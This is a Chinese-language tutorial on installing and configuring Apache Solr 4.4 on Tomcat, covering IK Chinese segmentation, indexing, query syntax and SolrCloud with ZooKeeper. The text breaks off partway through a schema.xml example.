VioletGo

Solr部署详解

目录 

1 solr概述  
    1.1 solr的简介 
    1.2 solr的特点 
2 Solr安装  
    2.1 安装JDK 
    2.2 安装Tomcat  
    2.3 安装solr  
    2.4 目录结构说明  
    2.5 SOLR HOME说明 
3 Solr配置  
    3.1 Solr.XML说明  
    3.2 配置SolrConfig.xml  
    3.3 配置schema.xml  
    3.4 配置中文分词  
    3.5 多实例部署 
4 solr使用  
    4.1 添加索引  
    4.2 更新索引  
    4.3 删除索引  
    4.4 提交和优化 
    4.5 查询索引  
5 扩展到SolrCloud  
    5.1 Zookeeper安装 
    5.2 启动SolrCloud 
    5.3 术语及注意事项 
6 SolrJ的使用  
    6.1 部署号码黄页的SolrCloud  
    6.2 SolrJ操作SolrCloud  
7 Solr管理

1 solr概述

1.1 solr的简介

solr是一个基于lucene的全文检索引擎。他包括了全文检索，命中高亮，准实时搜索，富文本检索等特性. Solr是用Java编写的，并作为一个独立的全文搜索服务器，比如tomcat容器内运行。Solr的全文索引和搜索其核心使用了Lucene Java搜索库，并具有类似REST的HTTP / XML和JSON的API，可以很容易地从几乎任何编程语言使用.

什么是全文检索？

全文检索是将存储于数据库中整本书、整篇文章中的任意内容信息查找出来的检索。它可以根据需要获得全文中有关章、节、段、句、词等信息，也就是说类似于给整本书的每个字词添加一个标签，也可以进行各种统计和分析。

对于全文检索来说，倒排索引是最常用的一种技术。倒排索引用来存储某个单词在一个文档或者一组文档中的存储位置的映射。它是文档检索系统中最常用的数据结构。

然后再我们检索的时候。系统会将我们需要查询的文本转化为检索词。然后去映射表中查询其对应的文档，然后做文档归并既可以获取到我们希望得到的结果。

Why solr？

既然Solr是基于lucene的，那为什么我们不直接使用Lucene呢？

Lucene是一个开放源代码的全文检索引擎工具包，即它不是一个完整的全文检索引擎，而是一个全文检索引擎的架构，提供了完整的查询引擎和索引引擎。Lucene的目的是为软件开发人员提供一个简单易用的工具包，以方便的在目标系统中实现全文检索的功能，或者是以此为基础建立起完整的全文检索引擎.

Lucene的涉及目标决定了lucene在扩展和管理索引上比较困难。但是solr提供了一个管理页面，并且可以动态的添加和删除索引节点。可以做索引之间的互备，而这些使用lucene则很难实现

1.2 solr的特点

基于标准的开放接口：Solr支持XML，JSON和HTTP的调用形式，所以虽然solr是用java写成，但是我们依然可以使用别的语言来调用solr
先进的全文检索技术：在Solr中，我们不仅可以使用词来作为检索条件，还可以使用时间范围，数字范围等作为检索条件，也可以进行模糊搜索。
线性可扩展性：可以在线的扩展索引节点，自动索引复制，自动故障切换和恢复。
近实时索引：数据添加到索引后，可以很快的被检索到。
管理界面：可以很方便的管理各个节点，包括索引统计信息以及各个节点的状态。

2 Solr安装

Solr的运行环境非常简单。只需要JDK和一个WEB容器。这里以Tomcat为例介绍Solr的安装。

2.1安装JDK

下载JDK：
http://www.oracle.com/technetwork/java/javasebusiness/downloads/java-archive-downloads-javase6-419409.html#jdk-6u45-oth-JPR 

设置权限：[root@localhost solrTest]# chmod 777 ./jdk-6u45-linux-i586.bin

安装：[root@localhost solrTest]# ./jdk-6u45-linux-i586.bin

设置环境变量，在/ect/profile中添加并export
[root@localhost solrTest]# vim /etc/profile
在文件的最后加上下面三句话，并在控制台内也执行这四句话
JAVA_HOME=/usr/local/solrTest/jdk1.6.0_45
CLASSPATH=.:$JAVA_HOME/lib.tools.jar
PATH=$JAVA_HOME/bin:$PATH
export JAVA_HOME CLASSPATH PATH

确定已经安装成功
在控制台执行
[root@localhost ~]# java –version
返回
java version "1.6.0_45"
Java(TM) SE Runtime Environment (build 1.6.0_45-b06)
Java HotSpot(TM) Client VM (build 20.45-b01, mixed mode, sharing)

2.2安装Tomcat

下载TOMCAT    http://tomcat.apache.org/download-60.cgi

解压缩       [root@localhost solrTest]# tar -zxvf apache-tomcat-6.0.37.tar.gz

启动Tomcat
[root@localhost apache-tomcat-6.0.37]# cd /usr/local/solrTest/apache-tomcat-6.0.37/bin/
[root@localhost bin]# ./catalina.sh start

访问页面测试下http://192.168.39.250:8080/  (虚拟主机的IP)
看到这个页面说明Tomcat运行正常

2.3安装solr

下载solr http://lucene.apache.org/solr/downloads.html
解压缩 [root@localhost solrTest]# tar zxvf solr-4.4.0.tgz
Solr解压后会有一个example目录，这个目录下是Solr自带的一个示例。这个示例下有一个已经编译好的Solr.War.我们后续的操作可以使用这个已经编译好的war包
将war包拷到Tomcat目录下:
[root@localhost solrTest]# cp solr-4.4.0/example/webapps/solr.war /usr/local/solrTest/apache-tomcat-6.0.37/webapps/solr.war

创建一个集合的文件夹并配置
[root@localhost solrTest]# mkdir testData    
[root@localhost solrTest]# cp -a solr-4.4.0/example/solr/* testData/

设置solr home
[root@localhost solrTest]# vi apache-tomcat-6.0.37/conf/Catalina/localhost/solr.xml

<?xml version="1.0" encoding="utf-8"?>
<Context docBase="/usr/local/solrTest/apache-tomcat-6.0.37/webapps/solr.war" debug="0" crossContext="true">
<Environment name="solr/home" type="java.lang.String" value="/usr/local/solrTest/testData" override="true"/>
</Context>

启动一下Tomcat
(/usr/local/solrTest/apache-tomcat-6.0.37/bin/startup.sh)
这时http://192.168.39.250:8080/solr 应该是无法访问的,主要是因为缺少配置文件
关闭tomcat (/usr/local/solrTest/apache-tomcat-6.0.37/bin/shutdown.sh)

拷贝一下文件:
[root@localhost solrTest]# cp solr-4.4.0/example/lib/ext/* apache-tomcat-6.0.37/webapps/solr/WEB-INF/lib/
[root@localhost solrTest]# cp solr-4.4.0/example/resources/log4j.properties apache-tomcat-6.0.37/lib/

再次启动 Tomcat    (/usr/local/solrTest/apache-tomcat-6.0.37/bin/startup.sh)
再次访问  http://192.168.39.250:8080/solr

可以看到 Solr已经可以正常的运行,现在我们来看一下Solr的目录结构

2.4目录结构说明

我们下载的Solr包后，进入Solr所在的目录，我们可以看到以下几个目录：contrib、dist、docs、example、licenses。下面分别对其进行介绍。

1) Contrib:Solr的一些扩展包,包括分词器,聚类,语言识别,数据导入处理,非结构化内容分析等.
2) dist：该目录包含build过程中产生的war和jar文件，以及相关的依赖文件。我们之前使用的solr.war实际上就是这个文件夹下的solr-4.40.war
3) example：这个目录实际上是Tomcat的安装目录。其中包含了一些样例数据和一些Solr的配置。第一次使用solr的时候可以直接启动这个目录下的start.jar来启动solr,以便对solr有个比较直观的了解

其中一些子目录也比较重要，这里也对它们稍作介绍。

example/multicore：该目录是一个包含了多实例配置信息的Solr的home目录。
example/solr：该目录是一个包含了默认配置信息的Solr的home目录。
example/webapps：tomcat的webapps目录，该目录通常用来放置Java的Web应用程序。在Solr中，前面提到的solr.war文件就部署在这里。

其余的2个目录docs和licenses则分别是本地的文档以及权限介绍.

2.5 SOLR HOME说明

Solr home目录实际上是一个运行的Solr实例所对应的配置和数据（Lucene索引）。就example来说,合法的solrhome目录有2个,一个是example/solr目录,另一个是example/multicore目录，他们的区别就是multicore是多实例的。

example/solr目录下主要有以下一些目录和文件：

solr.xml solr的主要配置文件,在solr启动的时候被加载,solr的配置信息包括端口号,连接时间,超时时间等.
collection1/conf/ schema.xml 该文件是索引的schema，包含了域类型的定义
collection1/conf/ solrconfig.xml 该文件是Solr的主配置文件,solr的版本,数据存放位置,定义扩展功能的使用等.

3 Solr配置

Solr的配置主要是以下三个主要的文件solr.xml, solrconfig.xml, schema.xml,在solr启动的时候,会首先检查solr.xml,这个文件时solr的全局的配置信息.告诉solr在哪里可以找到solr的实例.在solr.xml加载后,solr会去每个实例内查找solrconfig.xml. solrconfig.xml指向其他的配置文件.除非修改solrconfig.xml,否则将以schema.xml配置文件来决定Solr的字段

3.1 Solr.XML说明

Solr.xml的配置通常是不用修改的,配置文件可以修改的栏目如下:

<solr>
  <str name="adminHandler">${adminHandler:org.apache.solr.handler.admin.CoreAdminHandler}</str>
  <int name="coreLoadThreads">${coreLoadThreads:3}</int>
  <str name="coreRootDirectory">${coreRootDirectory:}</str> <!-- usually solrHome  -->
  <str name="managementPath">${managementPath:}</str>
  <str name="sharedLib">${sharedLib:}</str>
  <str name="shareSchema">${shareSchema:false}</str>
  <int name="transientCacheSize">${transientCacheSize:Integer.MAX_VALUE}</int> <!-- ignored unless cores are defined with transient=true -->

  <solrcloud>
    <int name="distribUpdateConnTimeout">${distribUpdTimeout:}</int>
    <int name="distribUpdateSoTimeout">${distribUpdateTimeout:}</int>
    <int name="leaderVoteWait">${leaderVoteWait:}</int>
    <str name="host">${host:}</str>
    <str name="hostContext">${hostContext:solr}</str>
    <int name="hostPort">${jetty.port:8983}</int>
    <int name="zkClientTimeout">${zkClientTimeout:15000}</int>
    <str name="zkHost">${zkHost:}</str>
    <bool name="genericCoreNodeNames">${genericCoreNodeNames:true}</bool>
  </solrcloud>


  <logging>
    <str name="class">${loggingClass:}</str>
    <str name="enabled">${loggingEnabled:}</str>
    <watcher>
      <int name="size">${loggingSize:}</int>
      <int name="threshold">${loggingThreshold:}</int>
    </watcher>
  </logging>

  <shardHandlerFactory name="shardHandlerFactory" class="HttpShardHandlerFactory">
    <int name="socketTimeout">${socketTimeout:}</int>
    <int name="connTimeout">${socketTimeout:}</int>
  </shardHandlerFactory>

</solr>

Solr.xml在加载以后,会去根目录下的每个目录进行搜索,直到遇到一个名为core.properties的文件. 发现core.properties文件的目录被当成一个sorlr的实例. core.properties可以设置的项目包括:

name 实例名字.
config 实例的配置文件名,默认为solrconfig.xml
dataDir 数据存储路径,默认为当前路径.
ulogDir 事物日志的存储路径,默认为当前路径
schema 域字段的配置文件,默认为schema.xml
shard 实例的 ID.
roles SolrCloud 中的角色定义是什么
loadOnStartup 是否是在solr启动的时候加载,默认为Ture.
coreNodeName solr核心节点名字

3.2 配置SolrConfig.xml

solrconfig.xml文件包含了大部分的参数用来配置Solr本身的。solrconfig.xml文件不仅指定了 Solr 如何处理索引、突出显示、分类、搜索以及其他请求，还指定了用于指定缓存的处理方法的属性，以及用于指定Lucene 管理索引的方法的属性。

3.2.1 插件加载

Solr的允许你加载自定义代码来执行各种任务,首先将你的solr的插件打成一个jar,然后以类似下面的方式配置solr,以便让solr知道如何加载他们

如果我们有多个实例,并且希望所有的实例都可以共享插件.可以在solr.xml中启动sharedLib属性.

如果只希望在某些实例中使用插件.则可以使用如下的方式来配置插件.

<lib dir=”../../../contrib./extractor/lib” regex=”.*\.jar” />
<lib path=”../a-jar-that-does-not-exist.jar”>

注意在默认情况下访问http://192.168.39.250:8080/solr/#/~logging页面应该会出现如下异常:

修改solrconfig.xml文件内的lib加载路径后,重新tomcat.再次访问.正常

< lib dir="/usr/local/solrTest/solr-4.4.0/contrib/extraction/lib" regex=".*\.jar" />
<lib dir="/usr/local/solrTest/solr-4.4.0/dist/" regex="solr-cell-\d.*\.jar" />
<lib dir="/usr/local/solrTest/solr-4.4.0/contrib/clustering/lib/" regex=".*\.jar" />
<lib dir="/usr/local/solrTest/solr-4.4.0/dist/" regex="solr-clustering-\d.*\.jar" />
<lib dir="/usr/local/solrTest/solr-4.4.0/contrib/langid/lib/" regex=".*\.jar" />
<lib dir="/usr/local/solrTest/solr-4.4.0/dist/" regex="solr-langid-\d.*\.jar" />
<lib dir="/usr/local/solrTest/solr-4.4.0/contrib/velocity/lib" regex=".*\.jar" />
<lib dir="/usr/local/solrTest/solr-4.4.0/dist/" regex="solr-velocity-\d.*\.jar" />

3.2.2 dataDir

默认情况下索引文件时在实例的./data的目录下,但是我们也可以使用来修改默认目录.

<dataDir>/var/data/solr</dataDir>

3.2.3 更新配置

<updateHandler class="solr.DirectUpdateHandler2">
    <maxPendingDeletes>100000</maxPendingDeletes>
    <autoCommit>
      <maxDocs>10000</maxDocs> 
      <maxTime>15000</maxTime>
      <openSearcher>false</openSearcher>
</autoCommit>
…

这个更新处理器主要涉及底层的关于如何更新处理内部的信息。（这个参数不同于来自客户端的手动更新）。

maxPendingDeletes 最大的缓冲项目
maxDocs 内存中最多的文档数
maxTime 触发自动提交的最大等待时间,单位是ms
openSearcher 在值为false的时候,在启动硬盘搜索的时候不会打开新的实例,导致内存内的信息可以被检索到

3.2.4 查询配置

<maxBooleanClauses>1024</maxBooleanClauses>

查询子句的最大的数量.这里的默认值为1024.修改这个值可以传入更多的条件.

3.2.5 缓存配置

<queryResultCache
  class="solr.LRUCache"
  size="512"
  initialSize="512"
  autowarmCount="256"/>

<documentCache
  class="solr.LRUCache"
  size="512"
  initialSize="512"
  autowarmCount="0"/>

这里也基本不需要修改，目前支持的缓存算法有LRU(近期最少使用算法),FastLRU,LFU(最近最不常用) FastLRUCache比LRU有更快的读取速度以及更慢的插入速度,而且有可能大小没有限制.

size是最大情况下缓存的条目（注意，不是内存大小）。Init是初始容量

filterCache存储了filter queries(“fq”参数)得到的document id集合结果。Solr中的query参数有两种，即q和fq。如果fq存在，Solr是先查询fq（因为fq可以多个，所以多个fq查询是个取结果交集的过程），之后将fq结果和q结果取并。在这一过程中，filterCache就是key为单个fq（类型为Query），value为document id集合（类型为DocSet）的cache。对于fq为range query来说，filterCache表现出其有价值的一面。

queryResultCache是对查询结果的缓存，documentCache用来保存<doc_id,document>对的

myUserCache是用户自定义的一个cache，如果开启了自定义的缓存。则不使用Solr自带的缓存。

3.3 配置schema.xml

schema.xml文件主要用来配置数据类型和字段信息.这些字段被用来建立索引和查询.

3.3.1 数据类型

数据类型可以在标签内用标签来定义.定义fieldtype时,最少应该包含name,class这个两个属性. name就是这个FieldType的名称，class指向类所在的位置.在fieldtype定义的时候,一般还会定义类型的analyser(分词器), similarity(评分器)等

<types>

  <fieldType name="text_dfr" class="solr.TextField">
    <analyzer class="org.apache.lucene.analysis.standard.StandardAnalyzer"/>
    <similarity class="solr.DFRSimilarityFactory">
      <str name="basicModel">I(F)</str>
      <str name="afterEffect">B</str>
      <str name="normalization">H2</str>
    </similarity>
  </fieldType>


  <fieldType name="text_ib" class="solr.TextField">
<analyzer type="index">
      <tokenizer class="solr.WhitespaceTokenizerFactory"/>
      <filter class="solr.StopFilterFactory" words="stopwords.txt" ignoreCase="true"/>
   </analyzer>
<similarity class="org.apache.lucene.search.similarities.DefaultSimilarity"/>
  </fieldType>

  ...
</types>
<similarity class="solr.SchemaSimilarityFactory"/>

analyzer,包括分词和过滤. 在index的analyzer中使用 solr.WhitespaceTokenizerFactory这个分词包，就是空格分词，然后使用 solr.StopFilterFactory这几个过滤器。在向索引库中添加text类型的索引的时候，Solr会首先用空格进行分词，然后把分词结果依次使用指定的过滤器进行过滤，最后剩下的结果才会加入到索引库中以备查询。Solr的analysis包中默认并不包括中文的分词包.

Similarity 是计算相似性的组件,相似性用于计算搜索命中后的得分,得分最后影响排序,Solr默认的评分器是基于TF-IDF的计算方法来实现的.通常这个是不用修改的.但是Solr4中支持分别为每个字段定义相似性计算的类以及全局的计算类.

3.3.2 字段

接下来的工作就是在fields结点内定义具体的字段（类似数据库中的字段），就是filed，filed定义包括name,type（为之前定义过的各种FieldType）,indexed（是否被索引）,stored（是否被储存），multiValued（是否有多个值）等等。

<fields>

 <field name="id" type="integer" indexed="true" stored="true" required="true" />
<field name="name" type="text" indexed="true" stored="true" />
<field name="summary" type="text" indexed="true" stored="true" />
<field name="keyword" type="text" indexed="true" stored="false" multiValued="true" />
  ...
</ fields >

field的定义相当重要，有几个技巧需注意一下，对可能存在多值得字段尽量设置 multiValued属性为true，避免建索引是抛出错误；如果不需要存储相应字段值，尽量将stored属性设为false。所谓multValued就是一个field有多个值,如下:

3.3.3 唯一键

定义唯一键. id

3.3.4 拷贝字段

拷贝字段举例来说,就是查询的时候不用再输入：userName:张三 and userProfile:张三的个人简介。直接可以输入"张三"就可以将“名字”含“张三”或者“简介”中含“张三”的又或者“名字”和“简介”都含有“张三”的查询出来。他将需要查询的内容放在了一个字段中，并且查询该字段就行了

如建立了一个统一的查询字段all,并将name和summary拷贝到这个字段内：

< field name="all" type="text" indexed="true" stored="false" multiValued="true" />

并在拷贝字段结点处完成拷贝设置：

<copyField source="name" dest="all"/>
<copyField source="summary" dest="all" maxChars="300"/>

拷贝字段可以设置最大的字符长度

3.3.5 动态字段

动态字段就是不用指定具体的名称，只要定义字段名称的规则，例如定义一个 dynamicField，name 为*i，定义它的type为text，那么在使用这个字段的时候，任何以i结尾的字段都被认为是符合这个定义的

如我们一开始定义字段的时候可能并没有考虑到有school这个字段,但是索引已经运行一段时间.并不方便再次修改索引的配置文件.这时就可以直接在添加索引的时候加上school_i这个字段而不需要修改配置文件就能生效.

3.4 配置中文分词

如上文所说,目前Solr中默认是不支持中文分词的.如果需要支持中文.则必须自己扩展分词组件.目前国内比较有名的分词组件有IK,庖丁, ICTCLAS, 盘古分词, mmseg4j等.就业内评测结果来说, ICTCLAS分词效果最好,而且包含词性识别.但是ICTCLAS分为商用版和免费版两种,免费版的测试结果欠佳.

如: 工信处女干事每月经过机房时都会检查二十四口交换机

结果为: 工/n 信/n 处女/n 干事/n 每月/r 经过/p 机房/n 时/ng 都/d 会/v 检查/v 二十四/m 口/q 交换机/n

就分词来说.主要需要考虑的要素为准确率和召回率.如

“世界杯”是一个词，用单字切分的话，查“世界”也可以命中这篇文档，而用中文分词就查不到了；而中文分词的支持者们的反驳大概是： “参加过世界杯”，用单字切分的话，查“过世”也可以命中这篇文档，但事实上并没有人挂掉；

所以通常的做法是在建立索引阶段.使用全切分的算法对文本中所有的可能性词语进行切分,并在检索阶段竟可能的去准确的分析用户的意图.

IK在处理全切分时,速度较快,并且可以返回所有的可能结果.下面以IK为例,配置中文分词.

下载IK.
https://code.google.com/p/ik-analyzer/downloads/detail?name=IK%20Analyzer%202012FF_hf1.zip&can=2&q=

解压
[root@localhost IK]# unzip IK.zip
拷贝到solr的lib下
[root@localhost conf]# cp /usr/local/solrTest/IK/IKAnalyzer2012FF_u1.jar /usr/local/solrTest/testData/lib/IK.jar

配置solrconfig.xml.设置IK的加载路径.

<lib path="../lib/IK.jar" />

配置schma.xml(这时一个最简单的schema文件)

<?xml version="1.0" encoding="UTF-8" ?>
<schema name="example" version="1.5">
<fields>
<field name="id" type="string" indexed="true" stored="true" required="true" multiValued="false" />
<field name="text" type="text_ik" indexed="true" stored="true"/>
<field name="_version_" type="long" indexed="true" stored="true"/>
</fields>
<uniqueKey>id</uniqueKey>
<types>
<fieldType name="string" class="solr.StrField" sortMissingLast="true" />
<fieldType name="long" class="solr.TrieLongField" precisionStep="0" positionIncrementGap="0"/>
<fieldType name="text_ik" class="solr.TextField">
<analyzer class="org.wltea.analyzer.lucene.IKAnalyzer"/>
</fieldType>
</types>
</schema>

启动Tomcat.并访问http://192.168.39.250:8080/solr 看到正常的solr页面表示插件已经正常加载了. 如果遇到问题.需要分析appache的日志来定位问题并修正.

3.5 多实例部署

多核，官方说法，让你只用一个Solr实例，实现多配置多索引的功能，为不同的应用保留不同的配置。就是每个core都有独立的solrconfig.xml与schema.xml，却依然保留统一与方便的管理。每份索引都可以当做一个独立的应用来对待，甚至可以实现索引的热切换。比如说，为新闻、微博、论坛搜索各建立一个搜索系统。

由上文提到的
“Solr.xml在加载以后,会去根目录下的每个目录进行搜索,直到遇到一个名为core.properties的文件”
Solr4中不在需要对多核心做特殊的配置,只需要创建新的collection文件夹就可以了.以下是一个简单的示例.

复制文件夹
[root@localhost testData]# cp -r collection1/ collection2/  
修改core.properties文件
[root@localhost collection2]# vim core.properties 

name=collection2

重新启动tomcat 既可以看到效果.

4 solr使用

Solr使用主要分为两个部分.一个是建立索引,一个是查询索引.建立索引的过程包括追加,删除,提交,优化(合并).Solr为了保证能够提供给其他语言接口.提供了REST接口(这里指可以使用HTTP协议和Solr进行交互).REST接口提供的格式有XML,JSON,CSV

下面介绍的时候.将先介绍REST的接口中的JSON的形式,再介绍Java的实现.其本质实际上是一样的.

4.1 添加索引

首先编辑我们需要上传的JSON文件(这个文件以上文中创建的solr实例collection1为例).

[
  {
    "id" : "978-0641723445",
    "text" : "Solr in Action"
  },
  {
    "id" : "978-1423103349",
    "text" : "Solr测试"
  },
  {
    "id" : "978-1857995879",
    "text" : "工信处女干事"
  }
]

文件命名为simpleTest.json

执行(HTML-POST)
[root@localhost testREST]# curl 'http://192.168.39.250:8080/solr/collection1/update/json?commit=true' --data-binary @simpleTest.json -H 'Content-type:application/json'

访问: http://192.168.39.250:8080/solr/collection1/select?q=%3A&wt=json&indent=true (q=: 即查询所有记录)

返回结果如上图.可以看到已经添加成功

4.2 更新索引

以下个JSON为例说明如何使用JSON来进行更新

[
"add": {
  "commitWithin": 5000,
  "overwrite": true,
"boost": 3.45,
  "doc": {
    "id": "978-1857995879",
    "text": "工信处女干事每月经过机房时都会检查二十四口交换机"
    "text": "工信处女干事每月经过机房时都会检查二十四口交换机"
}
}
]

访问页面.可以看到刚才的信息已经被更新

4.3 删除索引

为了演示删除这里又多加了一条数据 ID:978-1423103350,删除的代码很简单.

[
"delete": { "id":"978-1423103350" }
]

可以看到, ID:978-1423103350的记录已经被删除了

4.4 提交和优化

commit 告诉 Solr，应该使上次提交以来所做的所有更改都可以搜索到。默认情况下索引内容是在内存中,当显式的调用commit的时候.Solr就会把这部分内容写到硬盘.

optimize 重构 Lucene 的文件以改进搜索性能。索引完成后执行一下优化通常比较好。如果更新比较频繁，则应该在使用率较低的时候安排优化。一个索引无需优化也可以正常地运行。优化是一个耗时较多的过程。优化的主要作用是合并lucene文件,以减少IO操作.

在JSON中使用commit和optimize很简单.只要如下即可.

[
"commit": {},
"optimize":{}
]

Optimize有参数maxSegments .值是数值,表示优化后的段文件数目(默认为1)

4.5 查询索引

添加文档后，就可以搜索这些文档了。Solr 接受 HTTP GET 和 HTTP POST 查询消息。收到的查询由相应的 SolrRequestHandler 进行处理。

Solr部署才成功后.先进入http://192.168.39.250:8080/solr页面,然后选择solr的实例.再点击Query即可进入Solr的查询页面. Solr查询页面主要是提供了一个方面的查询接口.不用自己去拼接URL即可完成复杂的查询.如果需要最终的URL.可以在Solr查询页面的上面获取到拼接后的地址.

[Solr的检索运算符]

1. “:” 指定字段查指定值，如返回所有值*:*
2. “?” 表示单个任意字符的通配
3. “*” 表示多个任意字符的通配（不能在检索的项开始使用*或者?符号）
4. “~” 表示模糊检索，如示例中分词结果不存在二四.所以直接用二四查询会不存在结果.但是如果是”二四~” 则可以命中记录
5. 邻近检索，如查询text:”solr action”~0 没有结果而”solr action”~1 命中
6. “^” 控制相关度检索，如检索jakarta apache，同时希望去让”jakarta”的相关度更加好，那么在其后加上”^”符号和增量值，即jakarta^4 apache
7. 布尔操作符AND、OR、&&、||、+、<空格>
8. 布尔操作符NOT、!、- （排除操作符不能单独与项使用构成查询）
9. “+” 存在操作符，要求符号”+”后的项必须在文档相应的域中存在
10. ( ) 用于构成子查询 如 +text:((Solr && 测试)  处女)
11. [] 包含范围检索，如检索某时间段记录，包含头尾，date:[200707 TO 200710]
12. {} 不包含范围检索，如检索某时间段记录，不包含头尾date:{200707 TO 200710}
13. \ 转义操作符，特殊字符包括+ - && || ! ( ) { } [ ] ^ ” ~ * ? : \

Solr查询参数说明

•q - 查询字符串，查询的语法需要符合上述的检索运算符规则。
•fq -过滤语句,默认包含才会返回查询结果.如q=text:solr fq=text:in  则结果命中Solr in Action 如果q=text:solr fq=-text:in 则命中Solr测试
•fl - 指定返回那些字段内容，用逗号或空格分隔多个。如指定text 则不再返回id的值
•start - 返回第一条记录在完整找到结果中的偏移位置，0开始，一般分页用。
•rows - 指定返回结果最多有多少条记录，配合start来实现分页。
•sort - 排序，格式：sort=<field name><空格><desc|asc>[,<field name><空格><desc|asc>]… 。
示例：（id asc,text desc）表示先 “id” 升序, 再 “text” 降序，默认是相关性降序。
•wt - (writer type)指定输出格式，可以有 xml, json, php, python,ruby等。
•df - 默认的查询字段，一般默认指定
•qt - （query type）指定那个类型来处理查询请求，一般不用指定，默认是standard。
•indent - 返回的结果是否缩进，默认关闭，用 indent=true|on 开启，一般调试json,php,phps,ruby输出才有必要用这个参数。
•hl - 检索结果高亮 hl.fl用于设置需要高亮的字段.hl.simple.pre和hl.simple.post用于设置高亮的标签
•facet - 类似于字段统计.显示所有已经索引的字段以及他的数目.

5 扩展到SolrCloud

在Solr的早期版本中,分布式的索引是基于索引的复制分发，主节点负责建索引，建好之后定期复制分发到从节点，从节点负责查询；支持从URL指定从节点响应查询请求.这种情况下，根本就不能算作真正的分布式索引。而且对节点的管理，扩充，负载均衡等都只能依靠自己来实现。所以在Solr4中。引入了SolrCloud的技术方案。

SolrCloud是基于Solr和Zookeeper的分布式搜索方案，是正Solr4X的核心组件之一，它的主要思想是使用Zookeeper作为集群的配置信息中心。借助Zookeeper.Solr4实现了集中式的配置信息,自动容错以及查询时自动负载均衡

5.1 Zookeeper安装

下载: http://www.apache.org/dyn/closer.cgi/zookeeper/
解压Zookeeper [root@localhost solrTest]# tar zxvf zookeeper-3.3.5.tar.gz

编辑对应的zookeeper配置文件，复制zookeeperconf下zoo_sample.cfg为zoo.cfg

[root@localhost conf]# cp zoo_sample.cfg zoo.cfg
[root@localhost conf]# vi zoo.cfg
# The number of milliseconds of each tick
tickTime=2000
# The number of ticks that the initial
# synchronization phase can take
initLimit=10
# The number of ticks that can pass between
# sending a request and getting an acknowledgement
syncLimit=5
# the directory where the snapshot is stored.
dataDir=/usr/local/solrTest/zookeeper/
# the port at which the clients will connect
clientPort=2181

tickTime：心跳时间，为了确保连接存在的，以毫秒为单位，最小超时时间为两个心跳时间
initLimit：多少个心跳时间内，允许其他server连接并初始化数据，如果ZooKeeper管理的数据较大，则应相应增大这个值
clientPort：服务的监听端口
dataDir：用于存放内存数据库快照的文件夹，同时用于集群的myid文件也存在这个文件夹里（注意：一个配置文件只能包含一个dataDir字样，即使它被注释掉了。）
syncLimit：多少个tickTime内，允许follower同步，如果follower落后太多，则会被丢弃。

由于这里主要是使用SolrCloud 所以只配置一个Zookeeper来管理所有的Solr节点.在实际环境中可以按Zookeeper集群的方式来部署.

创建数据文件夹 [root@localhost bin]# mkdir /usr/local/solrTest/zookeeper
启动 [root@localhost bin]# ./zkServer.sh start

[root@localhost bin]# ./zkCli.sh 测试是否可以连接到Zookeeper服务器.如下则为正常

5.2 启动SolrCloud

编辑Tomcat的catalina.sh文件在启动Tomcat的时候初始化Zookeeper的配置文件及SolrCloud的环境变量

[root@localhost bin]# vi catalina.sh

JAVA_OPTS="$JAVA_OPTS -Dbootstrap_confdir=/usr/local/solrTest/testData/collection1/conf -Dcollection.configName=myconf4test -DnumShards=1 -DzkHost=192.168.39.250:2181 -Dj
etty.port=8080"

-DzkRun参数是启动一个嵌入式的Zookeeper服务器，它会作为solr服务器的一部分，这里是外部zookeeper，就不需要此参数
-Dbootstrap_confdir参数是上传本地的配置文件上传到zookeeper中去，作为整个集群共用的配置文件，
-DnumShards指定了集群的逻辑分组数目，数据会分散在里面，最小单位为doc。
Djetty.port也可用于tomcat，指定对外服务的端口号

测试SolrCloud是否已经成功启动

[root@localhost bin]# ./catalina.sh start  
访问页面 
http://192.168.39.250:8080/solr/#/~cloud

添加节点

主节点配置完成后,再添加节点就变得比较容易.只需要在别的机器节点的Solr启动的时候,指定Zookeeper的host所在的机器即可.如在39.251上配置一个solr环境,保证实例的字段和主节点的一致修改tomcat的文件

[root@localhost bin]# vi catalina.sh
JAVA_OPTS="-DzkHost=192.168.39.250:2181 -Djetty.port=8080"

启动节点一会可以看到

SolrCloud的查询在任意一个节点上都可以使用.

在查询的时候.会整合所有的shard的结果后再返回.所以只要指定collection.在任意一个存货节点上查询数据都是可以的.使用REST的时候只要先问ZK要存货节点就OK了

5.3 术语及注意事项

Collection 数据的集合,多个Collection就组成了Cluster(集群).同一个群集必须使用同一套schema和solrconfig
Shard 分片就是把Collection内的数据分成几份,分的越多负载也就越小.shard内的数据不会互相备份.
Leader 每个分片至少有一个shard
Replication 对leader的备份可以为0-n

注意:

1 JAVAOPTS的位置.在测试的时候. JAVAOPTS放在文件的最后不起作用.最后是放在

JAVA_OPTS (Optional) Java runtime options used when the "start"
2 主节点的选取时间在solrCloud运行的时候,如果一个节点挂掉或者是重新启动.其他的节点就进入了等待选取leader节点的状态.这时solrCloud也无法进行访问.这个选取leader的时间需要3分钟.我们可以通过配置文件来缩短这个等待时间.

在solr.xml上添加配置：leaderVoteWait="${leaderVoteWait:20000}"就可以将选取等待时间减少
```
<solrcloud>
    <str name="host">${host:}</str>
    <int name="hostPort">${jetty.port:8983}</int>
    <str name="hostContext">${hostContext:solr}</str>
    <int name="zkClientTimeout">${zkClientTimeout:15000}</int>
    <int name="leaderVoteWait">${leaderVoteWait:20000}</int>
    <bool name="genericCoreNodeNames">${genericCoreNodeNames:true}</bool>
</solrcloud>
```
3 默认情况下.有任意一个shard挂掉.将无法返回结果.可以在查询URL的后面加上shards.tolerant=true来忽略失效的shard

举例:

现在设置3个节点.250,251,252.251和252一个shard,251一个shard,停掉251,并查询

加上shards.tolerant=true后

6 SolrJ的使用

现在,Solr的安装部署,Solr云的部署都已经有了介绍.下面以号码黄页为例,介绍SolrJ的使用,在配置索引的使用,保留SolrCloud下的collection1 另建立一份collection,顺便介绍solrcloud下的多实例的部署.

6.1 部署号码黄页的SolrCloud

从原有的集合中copy一份配置出来

[root@localhost testData]# cp -r collection1/ YellowPages/
修改实例的名称
[root@localhost YellowPages]# vi core.properties 
name=YellowPages

修改黄页的资源实例.因为只DEMO的性质所以这里就简单的设计下. 黄页内一个项目只包含 id ,name ,address,phone,其中phone可以为多个.则schema.xml为

[root@localhost YellowPages]# vi conf/schema.xml

<?xml version="1.0" encoding="UTF-8" ?>
<schema name="example" version="1.5">
 <fields>
   <field name="id" type="string" indexed="true" stored="true" required="true" multiValued="false" /> 
   <field name="name" type="text" indexed="true" stored="true"/>
   <field name="address" type="text_ik" indexed="true" stored="true"/>
   <field name="phone" type="text" indexed="true" stored="true" multiValued="true" />
